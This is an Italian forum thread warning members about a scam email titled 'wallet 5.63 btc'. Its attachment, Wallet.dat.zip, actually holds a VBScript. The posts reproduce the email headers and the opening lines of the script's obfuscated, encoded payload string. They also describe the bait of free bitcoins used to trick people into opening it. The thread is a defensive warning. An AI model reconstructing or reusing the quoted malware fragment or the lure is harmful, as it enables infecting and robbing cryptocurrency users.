Topic: Mail sospetta - Attenzione !! Non aprite l'allegato (Read 911 times)

Potrebbero aver spammato gli indirizzi mail da Cryptsy Freshdesk o da qualche associata, https://cryptsy.freshdesk.com , ( non è possibile accedere alle impostazioni di sicurezza personali dell'account )   che e' stato usato recentemente per "regalare" moneta a chi sottoscriveva una petizione per farla ammettere su Cryptsy  

*****************************************************************************************************

Mailed From: bojan ucakar

Subject : wallet 5.63 btc

Questo e' l' l'Header della mail

Return-Path: <[email protected]>
Received: from 38.113.116.220 unverified ([38.113.116.220]) by mwde06oc.mail2world.com with Mail2World SMTP Server; Thu, 26 Dec 2013 13:44:23 -0800
Received: from 246-191.sl.smtp.com (unknown [192.40.191.246])by c1mailgw12.amadis.com (Postfix) with ESMTP id 8AF0C151AE6F7for <*****@***.com>; Thu, 26 Dec 2013 13:44:12 -0800 (PST)
X-MSFBL: amFua2tvNjBAZWFzeS5jb21AMTkyXzQwXzE5MV8yNDZARW1haWxBcm1zQA==
DKIM-Signature: v=1; a=rsa-sha256; d=smtp.com; s=smtpcomcustomers; c=relaxed/simple;q=dns/txt; [email protected]; t=1388094249;h=From:Subject:To:Date:MIME-Version:Content-Type;bh=PwR00QwRrB4yI2/ZP8nAHUavicgUpsxuDhws8uvNtK8=;b=AFoqBsgIWUqIMRzGk3lNJW9aSRFlU4KMM2hDsx1HqGH36x4smx1zlllzJ+Pvgu/2IXT8DNDCoHDuJshAt3kg//TPDBpz9IWB8AHZLtQYLyL/lOaQZcDb8AgSh0g3eJ9Ar5JEMhMCIOJO6PswSMeVLKIgu0ZCktom6LeEdPgJNgo=;
Received: from [69.64.92.38] ([69.64.92.38:61786] helo=69-64-92-38.dedicated.codero.net)by sl-mta05 (envelope-from <[email protected]>)(ecelerity 3.3.2.44647 r(44647)) with ESMTPAid 23/7D-00345-923ACB25; Thu, 26 Dec 2013 21:44:09 +0000
From: "bojan ucakar" <[email protected]>
Message-ID: <23.7D.00345.923ACB25@sl-mta05>
Subject: wallet 5.63 Btc
To: *****@***.com>
Content-Type: multipart/alternative; boundary="qyzU2jQGwOBMUWx6IgX=_gkHLpOYdCZgZW"
MIME-Version: 1.0
Date: Thu, 26 Dec 2013 14:44:05 -0700
X-SMTPCOM-Tracking-Number: 9f1397e2-3265-4288-b76b-e59520242341
X-SMTPCOM-Sender-ID: 29
X-SMTPCOM-Spam-Policy: SMTP.com is a paid relay service. We do not tolerate UCE of any kind. Please report it ASAP to [email protected]
X-CTASD-RefID: str=0001.0A010207.52BCA336.0001,ss=1,re=0.000,recu=0.000,reip=0.000,cl=1,cld=1,fgs=0
X-CTASD-IP: 192.40.191.246
X-CTASD-Sender: [email protected]
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:

J

Farei spostare il topic in modo da ottenere più visibilità, qualcuno potrebbe cascarci quindi meglio mettere in guardia gli utenti. Sarei curioso di scoprire la fonte dello spam/truffa/malware, l'argomento btc è sconosciuto ai più, forse qualche leak di email nel forum?

E' arrivata anche a me, ehheeh non sanno più che inventarsi   

queste truffe così demenziali mi fanno tornare in mente il mail spam "nigeriano" . 


(per chi non lo sapesse: http://it.wikipedia.org/wiki/Truffa_alla_nigeriana)

di sicuro l'ha fatto uno che di script ci capisce poco 

perchè farsi il mazzo a usare l'encoding tipico degli url quando per non far vedere cosa fa il codice bastava creare un vbe.

così se uno ha voglia di sbattersi lo decodifica alla fine.

ad ogni modo meglio non eseguirlo

Se ricevete una mail con allegato un fantomatico Wallet.dat.zip

e nel testo della mail si legge in inglese ,  che chi ve lo manda non lo sa usare e ci sono diversi BTC dentro..... .......... fate attenzione !!

quando scompattate il file , in realta' e' uno script con estensione .vbs

Inizia cosi' :

a="19%|_20%|_2%|_5%|_76%|_83%|_67%|_64%|_83%|_81%|_87%|_81%|_83%|_70%|_95%|_83%|_81%|_87%|_81%|_83%|_71%|_71%|_95%|_83%|"
a =a & "_81%|_87%|_81%|_83%|_67%|_67%|_83%|_81%|_87%|_81%|_83%|_70%|_95%|_83%|_81%|_87%|_81%|_83%|_69%|_71%|_75%|_83%|_81%|_87%|_81%|_83%|_73%|_64%|_83%|_124%|_123%|_21%|_3"
a =a & "0%|_31%|_5%|_81%|_76%|_81%|_16%|_3%|_3%|_16%|_8%|_81%|_89%|_19%|_20%|_2%|_5%|_88%|_124%|_123%|_33%|_24%|_81%|_76%|_81%|_83%|_84%|_83%|_81%|_87%|_81%|_83%|_16%|_83%|"

Non so cosa faccia, ma a "naso" e' molto molto meglio che non ci cliccate sopra

J